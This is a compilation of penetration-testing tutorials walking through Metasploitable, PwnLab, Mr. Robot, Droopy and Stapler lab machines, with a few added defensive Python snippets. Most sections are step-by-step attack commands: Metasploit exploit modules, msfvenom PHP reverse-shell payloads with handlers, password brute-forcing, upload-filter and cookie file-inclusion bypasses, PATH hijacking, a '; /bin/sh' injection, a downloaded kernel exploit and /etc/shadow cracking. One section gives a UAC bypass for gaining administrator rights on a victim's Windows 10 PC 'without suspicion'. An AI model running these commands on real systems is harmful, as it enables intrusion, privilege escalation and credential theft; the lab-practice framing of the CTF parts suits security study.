Now, for connecting to the network, you must be aware of the IP address of the workplace, or rather the server. 192.168.0.106 is the IP of my Windows Server 2008 R2 with the VPN setup and configuration, so I have entered this IP in Internet Address for the connection.


Earlier I set the privilege for user pentest to Allow Access for the VPN connection. When you try to connect it will ask for your credentials for authentication. The client enters his username and password to establish the connection and clicks on connect.


When the given credentials are found to be authorized, it will allow the client to connect to the workplace and provide the VPN connection.

This is a private and secure connection over the internet between client and server for sharing data in a transparent medium.


To ensure that you have a successful VPN connection, open your command prompt and type ipconfig; this shows another IP over the LAN.

My IP is 192.168.0.104 under PPP adapter VPN connection, which will be used for login to the server to access the network and share data, while I also have my LAN IP 192.168.0.105. This shows my VPN connection is established successfully.

Penetration Testing Skills Practice with Metasploitable (Beginner Guide)

Metasploitable is an intentionally vulnerable version of Ubuntu Linux, packaged as a virtual machine, designed for testing security tools and demonstrating common vulnerabilities; it helps us conduct security training, test security tools, and practice common penetration testing techniques. The VM will run on any recent VMware products and other virtualization technologies such as VirtualBox. You can download Metasploitable from --> https://www.vulnhub.com/entry/metasploitable-2,29/

Metasploitable is an exploitable environment which helps us to improve our skills and also to use every port to our advantage. As we all know, ports and protocols are the foundation of hacking; therefore, the more of them you understand, the more you can take advantage of the victim.


In this we will walk through the whole concept of Metasploitable, including how to install it and how to hack it step by step. We will take all the vulnerable ports one by one and try to exploit them. So, firstly you have to download Metasploitable from the above link. After the download is complete, open VMware and click on Open a virtual machine.


Locate the VMware image of Metasploitable that you just downloaded and click on OK.


After clicking on OK, Metasploitable will open in the virtual machine; to run it just click on Power on this virtual machine.


When it starts it will ask you for a username and password. By default the username and password are msfadmin and msfadmin respectively. Once you enter the username and password, Metasploitable will start.

Now that our vulnerable Linux machine is running, we can type the ifconfig command to retrieve its IP address.


Now, for penetration testing on Metasploitable, go to the terminal of your Kali Linux and scan the IP of Metasploitable with nmap so that we can see which ports are open; for this type:
nmap -sV 192.168.1.106


From the nmap output we can see which ports are open and which service is running on each port; therefore we can start our attack one by one on every vulnerable port. So, first we will attack vsftpd 2.3.4. As we know that this version is vulnerable, let us exploit it. For this, open Metasploit and type:
search vsftpd 2.3.4


Typing the above command will show the exploits that will help you attack the said version. So further type:

use exploit/unix/ftp/vsftpd_234_backdoor
set rhost 192.168.1.106
set rport 21
exploit

Once your attack is executed, you will reach the shell of Metasploitable and now you can do as you desire.
Now, we will exploit SSH, which works on port number 22. There is already an existing module for this port. It will help us apply a dictionary attack to crack the password of Metasploitable, so we will use it as:
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.106
set rport 22
set user_file /root/Desktop/user.txt
set pass_file /root/Desktop/pass.txt
exploit


As you can see, after execution it will start trying every username with every password to find the correct combination. In the end you will have the password along with the username.
Now we can use that password to enter the shell of Metasploitable; for this just go to the terminal of Kali and type:
ssh msfadmin@192.168.1.106
Here,
ssh --> is the service through which we are connecting
msfadmin --> is the username
192.168.1.106 --> is the victim's IP address


Upon execution you can see that you will automatically enter its shell.
Now, we will try to attack via telnet, which works on port 23. This port will also help us find the password first and then we can enter its shell. So, for this type:
use auxiliary/scanner/telnet/telnet_login
set rhosts 192.168.1.106
set rport 23
set user_file /root/Desktop/user.txt
set pass_file /root/Desktop/pass.txt
exploit


Similarly to SSH, it will also start a dictionary attack and step by step it will find the correct password. Now that you have the password you can log on to Metasploitable.

telnet 192.168.1.106
After typing this, it will ask you for the username and password, and once you enter these you will enter Metasploitable as shown below:
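From the defender's side, the ssh_login and telnet_login runs above leave a very recognisable trace in the target's authentication log. The following Python is an added example (not part of the original article) that parses constructed OpenSSH auth.log lines and flags the burst of failures from one source, including the case where the wordlist actually contained the password; 192.168.1.200 is an assumed attacker address and 192.168.1.50 an assumed legitimate admin.

```python
"""Detecting the footprint of a Metasploit ssh_login run in an OpenSSH auth log.

Added example for this article, not part of the original post: a module such as
auxiliary/scanner/ssh/ssh_login (and telnet_login against a login prompt) leaves
a burst of 'Failed password' lines from one source, often followed by one
'Accepted password'. The log lines below are constructed; 192.168.1.200 is an
assumed attacker address, 192.168.1.50 an assumed legitimate admin."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of /var/log/auth.log on the target during the dictionary attack.
SAMPLE_AUTH_LOG = """\
Jan  9 10:15:01 metasploitable sshd[4021]: Failed password for invalid user admin from 192.168.1.200 port 41322 ssh2
Jan  9 10:15:01 metasploitable sshd[4023]: Failed password for invalid user admin from 192.168.1.200 port 41324 ssh2
Jan  9 10:15:02 metasploitable sshd[4025]: Failed password for msfadmin from 192.168.1.200 port 41326 ssh2
Jan  9 10:15:02 metasploitable sshd[4027]: Failed password for msfadmin from 192.168.1.200 port 41328 ssh2
Jan  9 10:15:03 metasploitable sshd[4029]: Failed password for msfadmin from 192.168.1.200 port 41330 ssh2
Jan  9 10:15:03 metasploitable sshd[4031]: Accepted password for msfadmin from 192.168.1.200 port 41332 ssh2
Jan  9 10:15:03 metasploitable sshd[4031]: pam_unix(sshd:session): session opened for user msfadmin by (uid=0)
Jan  9 10:20:45 metasploitable sshd[4100]: Failed password for msfadmin from 192.168.1.50 port 50001 ssh2
Jan  9 10:31:10 metasploitable sshd[4102]: Accepted password for msfadmin from 192.168.1.50 port 50002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$"
)


def parse_auth_log(text):
    """Return (timestamp, ip, user, accepted) tuples for password auth events.

    Syslog timestamps carry no year; strptime fills in 1900, which is fine for
    measuring the gaps between lines of one log file."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # session open/close and other sshd noise
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
        events.append((ts, m.group("ip"), m.group("user"), m.group("result") == "Accepted"))
    return events


def find_password_guessing(events, threshold=5, window=timedelta(seconds=60)):
    """Flag source IPs with >= threshold failures inside `window`.

    Returns {ip: {"failures": n, "users": [...], "success_after_burst": bool}}.
    success_after_burst is the case that matters most: the wordlist contained
    the real password, so the account needs a reset, not just a block."""
    by_ip = defaultdict(list)
    for ev in sorted(events):
        by_ip[ev[1]].append(ev)

    hits = {}
    for ip, evs in by_ip.items():
        failures = [ev for ev in evs if not ev[3]]
        burst_end = None
        lo = 0
        for hi in range(len(failures)):           # sliding window over failure times
            while failures[hi][0] - failures[lo][0] > window:
                lo += 1
            if hi - lo + 1 >= threshold:
                burst_end = failures[hi][0]
                break
        if burst_end is None:
            continue                               # normal typo rate, not a wordlist
        success_after = any(
            ev[3] and burst_end <= ev[0] <= burst_end + window for ev in evs
        )
        hits[ip] = {
            "failures": len(failures),
            "users": sorted({ev[2] for ev in failures}),
            "success_after_burst": success_after,
        }
    return hits


if __name__ == "__main__":
    for ip, info in find_password_guessing(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(ip, info)
```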


Now we will try to exploit port number 80, on which the HTTP service runs. For this too there is a pre-installed exploit in Metasploit, and to exercise the said exploit type:

use exploit/multi/http/php_cgi_arg_injection
set rhost 192.168.1.106
set rport 80
exploit


After the execution you will enter a meterpreter session on Metasploitable as shown.
Next we will try to exploit the Samba service that is running on port number 139. For that we will use the following exploit:

use exploit/multi/samba/usermap_script
set rhost 192.168.1.106
set rport 139
exploit


The execution of this will take you to a shell session, that is, you will reach the shell of Metasploitable.
Now, we will use the following exploit:
use exploit/multi/misc/java_rmi_server
set rhost 192.168.1.106
set rport 1099
exploit


Again, after you hit the enter button on your keyboard you will have a meterpreter session.
The next exploit is:
use exploit/linux/postgres/postgres_payload
set rhost 192.168.1.106
set rport 5432
exploit


Once the command is executed you will enter the meterpreter session as shown above.
The next exploit we use is related to UnrealIRCd, and to search for its exploit type :
search Unreal ircd
And the result will be exploits which will help you attack the victim. As you can see there are three exploits and we will use the latest one.


To use the exploit, type:
use exploit/unix/irc/unreal_ircd_3281_backdoor
set rhost 192.168.1.106
set rport 6667
exploit



Penetration Testing in PwnLab (CTF Challenge)

In this article we will walk through a root2boot penetration testing challenge, PwnLab. PwnLab is a vulnerable framework, based on the concept of CTF (capture the flag), with a bit of security which is a little complicated to bypass. But it’s not impossible. So, let us learn how we can get access to it.
Download From Here

Now to start, let us first assume that we do not know the IP of PwnLab; therefore we search for the IP address beforehand, and for that there is a command that shows us all the IPs present in our network. So go to the terminal of your Kali and type :


netdiscover


Target IP = 192.168.0.105
Knowing that, we start our penetration testing. So, first, we will scan with nmap; we will apply an aggressive scan as it gives detailed information and is fast. The command is :
nmap -A 192.168.0.105


We have the result of scanning and as you can see there are only three ports open and they are: 80, 111, 3306.

Our target IP is 192.168.0.105, as its MAC vendor is VMware. It is our best shot, but to be sure let us check this IP in our browser. We can crosscheck it from the browser as port number 80 is open, i.e. it can be opened in the browser. In the browser we can see that PwnLab has three pages: home, login and upload. To enter the server we have to upload our code into it, and for that we must know a username and password.


As we need to know the username and password, we will use the nikto command to find the file which stores them. Nikto helps us learn the file names and the data they contain. The command for this is:
nikto -h 192.168.0.105


As you can see, /config.php (PHP config file, may contain database IDs and password) is the file that has the username and password. Now that we know the file name we can use the curl command to read the contents of the file.

cURL is a computer software project providing a library and command-line tool for transferring data using various protocols. The cURL project produces two products, libcurl and curl. It was first released in 1997. The name originally stood for "see URL".
And the curl command is :




The highlighted part in the above image is our result and has the information about the username and password. But note that the information is base64 encoded, which we will have to decode in order to read it.
To decode it we will use HackBar. HackBar is a Firefox add-on that contains various functions, but the most important one for us is that it helps us encode and decode base64 strings.
To decode, copy the string, go to HackBar and click on the Encoding option. A drop-down menu will appear; now select the Decode option.


A dialog box will open, paste the copied string on the text box and click on OK.


The decoded result will appear in HackBar in readable form. And this way you will have your username and password.


So, the username is root and password is H4u%QJ_H99.
Now we use the mysql client to see the usernames and passwords. The command is:
mysql -h 192.168.0.105 -u root -p Users
After typing the command it asks for the password, so here enter the decoded password and press enter.


And so you will have the usernames and passwords; in this case the usernames are kent, mike, kane with their passwords. These passwords are base64 encoded, and to decode them use HackBar as we did earlier. Also shown below:


And like this we will have our passwords.


Now that we have our usernames and passwords, we need to create a PHP file that we will upload. We will make this raw file with msfvenom. The command is:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 -f raw


Once the file is generated, copy the code from the .php file.


Now if you try to upload this file you will get an error saying 'not allowed extension, please upload images only'. So, therefore, you will need to change the extension of your .php file.

Before changing the extension you need to add GIF98 at the top of the code as shown below; also change the extension to .gif


After changing the extension, when you try to upload the file you will succeed.


Once the file is uploaded, we still need a way to execute this file. For that, right click on that file and click on the copy image location option.

Now that you have copied the image location, you need to install Tamper Data. Tamper Data is a Firefox extension which gives you the power to view, record and even modify outgoing HTTP requests. It helps you capture cookies and HTTP requests.
Open Tamper Data and click on Start Tamper.


A dialog box will appear. In it, click on the Tamper button in the right corner.


By doing so a dialog box will appear. Keep this dialog box open in the background and open Metasploit meanwhile.



After opening metasploit type:

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.106
set lport 4444
exploit

Running the above commands will help you gain a meterpreter session on the lab.
Now go to that dialog box of Tamper Data which was open in the background. In the dialog box you can see there is a cookie option. In the text box adjacent to the cookie option delete whatever was written and type:
lange=../*Image location path*
Here,
*image location path* is the path of the file that you uploaded and copied after that.


By doing so you are making the page include and execute your own malicious file instead of running its own code; this is what the cookie gives us. After giving the path, the second you click on OK, you will have your meterpreter session.
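Two application-side checks would have stopped both steps used above: the image upload was accepted on its extension alone (defeated by a GIF98 header and a .gif name), and the cookie value was used directly as an include path. The following Python is an added defender-side example, not PwnLab's own PHP: the weak upload filter beside a hardened one, and an allow-listed resolver for the language cookie. The sample files and LANG_DIR are constructed assumptions.

```python
"""Closing the two PwnLab weaknesses the walkthrough abuses.

Added example, not PwnLab's own PHP: weak_upload_check() mirrors the observed
behaviour (extension-only filter, defeated by a 'GIF98' header and a .gif name),
hardened_upload_check() is what a defender would ship instead, and
resolve_lang_file() shows an allow-listed replacement for a cookie value that is
used as an include path. Sample files and LANG_DIR are constructed."""
import os
import re

ALLOWED_EXT = {".gif", ".jpg", ".jpeg", ".png"}
# Real file signatures; a "GIF98" header matches neither GIF variant.
MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
}
PHP_TAG = re.compile(rb"<\?(?:php\b|=|\s)")

# Constructed inputs: a 1x1 GIF, and the shape of the upload used in the article,
# a fake GIF header on top of PHP code (a harmless echo stands in for the payload).
REAL_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff!\xf9\x04"
            b"\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")
BYPASS_GIF = b"GIF98\n<?php echo 'constructed marker'; ?>\n"


def weak_upload_check(filename):
    """Extension only: the check behind 'not allowed extension, please upload images only'."""
    return os.path.splitext(filename)[1].lower() in ALLOWED_EXT


def hardened_upload_check(filename, data):
    """Extension, real magic bytes, and no PHP open tag anywhere in the body.

    Magic bytes alone are not enough (a genuine GIF can carry PHP after its
    header), and even this check should be paired with storing uploads where
    the PHP engine never interprets them."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXT:
        return False
    if not data.startswith(MAGIC[ext]):   # startswith accepts a tuple of prefixes
        return False
    if PHP_TAG.search(data):
        return False
    return True


LANG_DIR = "/var/www/html/lang"   # assumed location of the language files


def resolve_lang_file(cookie_value, known_langs=("en", "fr"), base=LANG_DIR):
    """Map a language cookie to a file without letting the value steer the path.

    The article's cookie of '../<uploaded image path>' is rejected by the allow-list;
    the commonpath check is a second guard in case the allow-list is ever widened."""
    if cookie_value not in known_langs:
        return None
    path = os.path.normpath(os.path.join(base, cookie_value + ".php"))
    if os.path.commonpath([base, path]) != base:
        return None
    return path


if __name__ == "__main__":
    print("weak check lets the bypass through:", weak_upload_check("payload.gif"))
    print("hardened check rejects it:", not hardened_upload_check("payload.gif", BYPASS_GIF))
    print("traversal cookie resolves to:", resolve_lang_file("../upload/payload.gif"))
```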


But this is not enough, as we still need to become admin. If you go to the shell of the lab and try to switch user, you will note that the command shows an error. To gain full access to PwnLab you will still need to run some commands. So, therefore, type:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py


The execution of the command will give you a proper terminal inside PwnLab, and if you try to switch user you will succeed. The command to switch user is:
su kane
iSv5Ym2GRo
Here,
su --> denotes the switch user
kane --> the user you want to switch to
iSv5Ym2GRo --> is the password
After executing it, you will become the user kane.
Next, if you type the ls command you will see that there is a folder named home. So, we will go into that folder, and to do so, type:
cd home
As you have entered the home folder, type:
ls -lsa
This command will show you all the users in home with all the details. So, now that you know how many users there are and what their usernames are, go back to the kane user; for that type :
cd kane (this command will bring you back to the kane user)
ls -lsa (this command will list all the files present in kane)
As you can see in the image below, there is a file in the kane user called msgmike. Let us try to open it; therefore, type :
./msgmike
If you try to open it, it will give you an error saying no such file exists. So, now let us change user and see if we can open this file from another user; type :
cd ..
cd kent
cd mike


You can see that permission for every other user is denied. So now, type:
echo "/bin/bash" > cat
chmod 777 cat
With the above commands we are creating a file named cat that contains /bin/bash; the real cat command allows us to create single or multiple files, view the contents of a file, concatenate files and redirect output in the terminal or to files. After creating the file we are giving it permission to execute through the chmod command.


Then further type:
export PATH=.:$PATH
./msgmike
Once the above commands are executed, we will have access to the msgmike file as we desired and will have become the other user, mike. Now if you type:
id
You will see that the above command shows you which user you are, and will also inform you whether you are the administrator user.


Now that you are the user mike, open the home folder and then go to the mike folder. Then type:
./msg2root
test; /bin/sh
id (this command will show you the user)
whoami (this command will tell you that you are the administrator)
ls (it will show the list of files in root)
cat flag.txt (this command will display flag.txt, which was our main motive)


This was an excellent challenge. It requires us to think outside of the box, correlate findings, and manually validate vulnerabilities. This was a good example of the importance of manual methods, as no automated vulnerability scanner would have disclosed the flaws found during this engagement. This challenge also demonstrates the importance of validating user input.  

Hack the Mr. Robot VM (CTF Challenge)

This is another of our root2boot penetration testing challenge articles. We will walk through the exploitable framework Mr. Robot. It is based on the TV show Mr. Robot and has three keys hidden in different locations. The main goal is to find all three tokens hidden in the system. Each key is progressively more difficult to find. Breaking into it isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

First download the Mr Robot lab from here

First of all we have to find its IP address and for that go to the terminal of your Kali and type :


netdiscover


Upon the execution of the above command we will know about all the IP addresses in our network. Our target IP is 192.168.0.102, let us scan it.
To scan our target IP we will use an aggressive scan (-A):
nmap -A 192.168.0.102


The scan's result shows us the open ports are : 22, 80, 443. As port 80 is open we can try to open this IP in our browser.


And yes, it opens, which further confirms our target.
Next we will run nikto against it. The nikto command will help us gather information like its files and all the other major things that we ought to know about our target. So, therefore, type :
nikto -h 192.168.0.102


From the result we can gather that there is a text file named robots.txt which might provide us with some further information. So now let us try to open this file in the browser.

I opened the key-1-of-3.txt file from the browser and so I had the first of the 3 keys mentioned in the readme.

Now let us open the fsocity.dic file, which is a dictionary file, in the browser.


Once we open the said dictionary file in the browser, it asks us to download it. Going ahead we downloaded and opened it. It is a file which may contain usernames and passwords.


So now that we know we might have usernames and passwords, we will try to log on to our target. One by one we have tried every username and it has given the error that the username doesn't exist. But when we used the name elliot it gave us the error that the password is incorrect.

With this we know one thing for sure: elliot is a correct username, and now we just have to find a password for it.


Our best guess is that the password is in the same dictionary file from which we found the username. Thus, moving forward we will use WPScan to find our password from the same file. For this open WPScan in the terminal of Kali and type :
ruby ./wpscan.rb --url http://192.168.0.102 --wordlist /root/Desktop/fsocity.dic --username elliot
Here,
./wpscan.rb --> starts the WPScan
--url --> denotes the URL on which WPScan will work
http://192.168.0.102 --> is our URL
--wordlist --> denotes the path of the dictionary file
--username --> denotes username
elliot --> username


Once the command starts working it will take its time to execute as the dictionary file we got is huge. So, sit back, relax and let WPScan do its work.


When the execution is complete (which may take a long time; in our case it took almost 4 hours) you will have the password for the username elliot, which is ER28-0652.
Using the password, log on to the target.


Once you have logged in, make the malicious file that you have to upload into it. Generate the code through the msfvenom command :

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 -f raw


Copy the code (up to die();) and paste it into the template (and save it).

Now that you have access to the WordPress admin console, the way in is to replace one of the theme templates with some PHP of your own. I decided to try for a reverse shell by editing the 404.php theme file and replacing its contents with the msfvenom generated shell.


And simultaneously open Metasploit and type :
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.106
set lport 4444
exploit


Once the exploit is running, open the path of the template in the browser as shown :
Browse to http://192.168.0.102/wp-content/themes/twentyfifteen/404.php and press enter


Once you open the template path in the browser you will have a meterpreter session, and once you have it, go to the shell and type :

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py


After doing the above, you will be a user on our target, and to learn all the information about the user type :
ls -lsa (gives us the information about the user we just entered)
cd home (takes us into the folder home)
ls -lsa (gives the information about the home folder)
cd robot (takes us into the robot folder)


Now, to learn the contents of the robot folder we will type :
ls -lsa
We now know that there are two important files: one of them is a text file, the other is a password in the form of an MD5 hash. If we try to open the text file by typing :
cat key-2-of-3.txt
it will not open as we do not have permission to do so. But now let us try to open the MD5 file, and for that type :
cat password.raw-md5
Executing the above command will give the MD5 value (hash value) of the password as you can see below :


We will use md5cracker.org (an online MD5 hash cracker) to crack this MD5 value. Enter the MD5 value in the text box and click on the crack/encrypt button.

The value will translate to abcdefghijklmnopqrstuvwxyz as shown below :


Now in the terminal try to switch user to robot with the command :
su robot
Following the command it will ask you for the password. Enter the cracked MD5 password here and you will become the robot user; to gather its information type :
ls -lsa
Now, try to open the remaining text file by typing :
cat key-2-of-3.txt


Next type the following :
nmap
nmap --interactive
With the above commands you will enter nmap's interactive mode; then type :
!sh
id (to know the users)
cd /root (lets you enter root)


Once you have entered root, type :
ls -lsa
cat key-3-of-3.txt

And upon the execution of this we will obtain 3 of 3 keys, hence completing Mr. Robot. There are many ways to perform the above but this method is the easiest. We hope you find it effective and interesting and that it helps you to improve.



Hack Admin Access of Remote Windows 10 PC using TpmInitUACBypass

Microsoft is increasing its security with the evolution of Windows. And with that it is getting more and more difficult to hack. It is often said "where there is a will, there is a way"; therefore, thankfully, it is not impossible to do so. Once you have hacked into a Windows 10 PC it is difficult to gain administrator access without making your victim suspicious. Therefore, we present you a new way to do so.
Follow the steps below and you will learn how to gain administrator access on a Windows 10 PC without the victim's suspicion.
First of all, to learn how to hack the victim's PC click here.
After hacking, when you have gained a meterpreter session, type :

getsystem

Using this command you will confirm the fact that you have not got administrator access yet. So now, there is no need to worry. Just download the TpmInit file from --> here
And now upload the said file into the victim's PC by typing :

upload /root/Desktop/TpmInitUACBypass.exe d:\\

Here,
upload --> is used to upload a file
/root/Desktop/TpmInitUACBypass.exe --> is the path of the file that is to be uploaded

d:\\ --> is the location where the file will be uploaded on the victim's PC


As the file is uploaded, open Metasploit simultaneously and type :
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.0.106
set lport 443
exploit


Once this exploit is running, go to the meterpreter session that you previously had and type :
shell

Typing shell will take you to the shell of the PC. Now further type :

d: (This command will take you into the D drive of the victim's PC, i.e. where you uploaded your file)

TpmInitUACBypass.exe 192.168.0.106 msf (This command will execute your uploaded file)


As the command executes our file, we will have a session with administrator privileges as shown.



Hack the Droopy VM (CTF Challenge)

In this article we will complete a root2boot challenge of the Capture the Flag series. This is a walkthrough of Droopy, which is a vulnerable framework but is a little bit complex too. Download it from --> Here

Walkthrough
Let us start by scanning the network so that we can know the IP of our target. To scan the network, type the following:


netdiscover


Our target IP is 192.168.1.103. Now that we know our target let's scan it; therefore, type:
nmap -A 192.168.1.103


From scanning, we gather that port number 80 is open and that it has Drupal version 7, which is known for its vulnerability. So let us start exploiting it so that we have our meterpreter session. To exploit, open Metasploit and type:
search drupal


Searching for the drupal exploit will list the various exploits. From the exploits you need to use the drupal_drupageddon exploit. Now, type:
msf exploit (drupal_drupageddon)>set rhost 192.168.1.103 (IP of Remote Host)
msf exploit (drupal_drupageddon)>exploit


Upon the execution of the above exploit you will have a meterpreter session. Once you have the meterpreter session, run the following commands; they give you a proper shell with better visibility of the path that you are in:

shell
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
Using the above commands we have entered the terminal. Our next step is to find the Ubuntu version. To find it, type:
lsb_release -a


We now know that our target is using Ubuntu 14.04. Let us try to search for its exploit on exploit-db.com. Our search is successful and we have found our appropriate exploit as shown below:


We already know that this exploit is not available in Metasploit, from the site below:

Now, to download the exploit, we have to find a writable directory. I need to find a directory I can write to and run scripts from.
find / -writable -type d 2>/dev/null
cd /tmp/ (It will take us into the /tmp folder)
wget https://www.exploit-db.com/download/37292 (This will download the exploit)


Now we have the downloaded file; we compile it and then run it so as to get control of root. To do so, the commands are:
mv 37292 37292.c (It will move the file and rename it)
gcc 37292.c -o kernel (This command will compile the file and save the output as kernel)
chmod 777 kernel (It will give you permission to execute the file)
./kernel (It will execute the file)
After executing the above commands we will be root. To confirm it let us try a command:
whoami (This command will inform you that you are root)
cd /root (it will take you into the /root folder)
ls (it will list all the files present in the root folder)


We have found a file named dave.tc. If you open the file in the browser it will ask you to download the file. OK! Let’s download it.

We can easily get to /var/www/html/sites from the web front end, so let's copy dave.tc there

cp dave.tc /var/www/html


Let's open the file with VeraCrypt, the software which mounts the container so that you can open it. Download it from --> https://veracrypt.codeplex.com/wikipage?title=Downloads
When you open VeraCrypt, select slot 1 so that it mounts the container as drive 1.


When you try to mount it, it asks for a password. We don't have the password, so let us explore and find it.


First of all let us look at the file which contains all the password hashes. The hashes are stored in /etc/shadow, and the command to read it is:
cat /etc/shadow


We have the hash of root. Now let us check which hash algorithm was used. We used an online hash identifier for this; search Google for "online hash identifier".


We used onlinehashcrack.com. Paste the hash on the site; the result shows that SHA512 was used to hash it.
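The algorithm can also be read locally from the "$id$" prefix that crypt(3) stores in the hash itself (a "$6$" prefix is SHA-512 crypt), which avoids pasting hashes into a third-party site. The following is an added example, not code from the original walkthrough; the shadow entries in it are constructed placeholders, not the Droopy VM's real file.

```python
"""Identify the crypt(3) hashing scheme of /etc/shadow entries.

Added example, not from the original walkthrough: instead of pasting a hash
into an online identifier, read the "$id$" prefix that crypt(3) stores in the
hash itself. The sample entries below are constructed placeholders, not the
Droopy VM's real shadow file.
"""
import re

# crypt(3) scheme ids as used by glibc / libxcrypt.
CRYPT_IDS = {
    "1": "MD5-crypt",
    "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "SHA-256-crypt",
    "6": "SHA-512-crypt",
    "7": "scrypt",
    "y": "yescrypt",
    "gy": "gost-yescrypt",
}

# Schemes an audit should flag: no password at all, or fast legacy hashes.
WEAK_SCHEMES = {"EMPTY", "DES-crypt", "MD5-crypt"}

# Constructed sample lines (hash bodies are dummy text of plausible shape).
SAMPLE_SHADOW = """\
root:$6$abcdefgh$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcd:17000:0:99999:7:::
daemon:*:17000:0:99999:7:::
legacy:$1$saltsalt$abcdefghijklmnopqrstuv:17000:0:99999:7:::
newer:$y$j9T$saltsaltsaltsalt$hashhashhashhashhashhashhashhashhashhashhas:17000:0:99999:7:::
nopass::17000:0:99999:7:::
"""

_PREFIX_RE = re.compile(r"^\$([^$]+)\$(.*)$")


def parse_shadow_line(line):
    """Return user, scheme, salt, rounds and locked state for one shadow line."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 2:
        raise ValueError("not a shadow entry: %r" % line)
    user, secret = fields[0], fields[1]
    entry = {"user": user, "scheme": None, "salt": None,
             "rounds": None, "locked": False}
    if secret == "":
        entry["scheme"] = "EMPTY"            # no password required at all
        return entry
    if secret.startswith(("!", "*")):
        entry["locked"] = True               # no password login possible
        return entry
    m = _PREFIX_RE.match(secret)
    if not m:
        # Traditional DES crypt: 13 chars, the first two are the salt.
        entry["scheme"] = "DES-crypt"
        entry["salt"] = secret[:2]
        return entry
    crypt_id, rest = m.groups()
    entry["scheme"] = CRYPT_IDS.get(crypt_id, "unknown($%s$)" % crypt_id)
    parts = rest.split("$")
    if crypt_id in ("5", "6") and parts[0].startswith("rounds="):
        entry["rounds"] = int(parts[0][len("rounds="):])
        parts = parts[1:]
    if crypt_id in ("y", "gy", "7"):
        # "$y$<params>$<salt>$<hash>": the salt is the second component.
        entry["salt"] = parts[1] if len(parts) > 1 else None
    elif crypt_id in ("1", "5", "6"):
        entry["salt"] = parts[0]
    return entry


def audit_shadow(text):
    """Return (user, scheme) for every unlocked entry that uses a weak scheme."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        entry = parse_shadow_line(line)
        if not entry["locked"] and entry["scheme"] in WEAK_SCHEMES:
            findings.append((entry["user"], entry["scheme"]))
    return findings


if __name__ == "__main__":
    for line in SAMPLE_SHADOW.splitlines():
        e = parse_shadow_line(line)
        print("%-8s %-14s salt=%s rounds=%s locked=%s" %
              (e["user"], e["scheme"], e["salt"], e["rounds"], e["locked"]))
    print("weak:", audit_shadow(SAMPLE_SHADOW))
```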


While exploring we also found a mail. Let us read it by typing:
cat /var/mail/www-data


Reading the mail we know certain things for sure:

·         the password is 11 characters long
·         the password is related to academy
To find the password we will first run a command which filters rockyou.txt. We strongly suggest filtering it, as it contains 8M passwords; running the whole file as it is would take a whole day. So we filter on three conditions: the word must be 11 characters long, in lower case, and contain the word academy.
To do so, the command is:

awk 'length($1) == 11 { print $1 }' /usr/share/wordlists/rockyou.txt | egrep '^[[:lower:]]+academy' > /root/Desktop/pass.txt


Now that we have our filtered list, we find the password using truecrack. The command is:
truecrack --truecrypt /root/Download/dave.tc -k SHA512 -w /root/Desktop/pass.txt


Using the above command you will have the password in minutes. Now that we have it, we mount the drive from VeraCrypt again: follow the same procedure as earlier, enter the password and tick the TrueCrypt mode option.


When you click OK, the mounted drive appears on your Desktop.

Open the drive by double-clicking it, go to .secret, then open .top, and at last you will have flag.txt.

VOILA!! You have captured the flag!!

This was the walkthrough of Droopy. Enjoy capturing the flags!

Hack the Stapler VM (CTF Challenge)

In this article we will try to attack and gain root access to the Stapler: 1 challenge from VulnHub. The goal is to perform reconnaissance, enumeration and exploitation of this vulnerable machine to get root access and read the contents of flag.txt. We have been told that there are various methods to do so, but we have tried and found the simplest way.

Download the Stapler VM from here

WalkThrough

Start off by scanning the network to find our target. The command for it is:

netdiscover


We found our target --> 192.168.1.105
To scan our target we will use Sparta. Sparta combines nmap scanning with Nikto and makes our work simpler. To open Sparta: Kali Linux > Applications > Information Gathering > Sparta. After Sparta opens, click where it says "click here to add host to scope". A dialog box opens asking for the target's IP; enter it and click on add to scope.


Once Sparta starts working, it shows all the ports open on our target.


The result shows that ports 21, 22, 53, 80, 137, 139, 666, 3306 and 12380 are open. The Nikto tab for port 80 shows that we can open the target IP in a browser; it also tells us that /.bashrc and /.profile are files which may contain useful information.


Firstly, we will open our target IP in the browser to see if we find anything.


As you can see, we did not find anything upon opening the target IP in the browser. So we tried to open the two files we found with the help of Nikto. Opening them prompts a download; no harm in that, so we downloaded them.

We regretted doing so as there was nothing in either file. So we explored more of what Nikto has to provide and found that we could go after port 21, which runs FTP. Nikto had taken the liberty of running hydra and finding the FTP credentials: the username is ftp and the password is password.


Now that we had the username and password, we tried them from the Kali terminal by typing:
ftp 192.168.1.105
ftp (username)
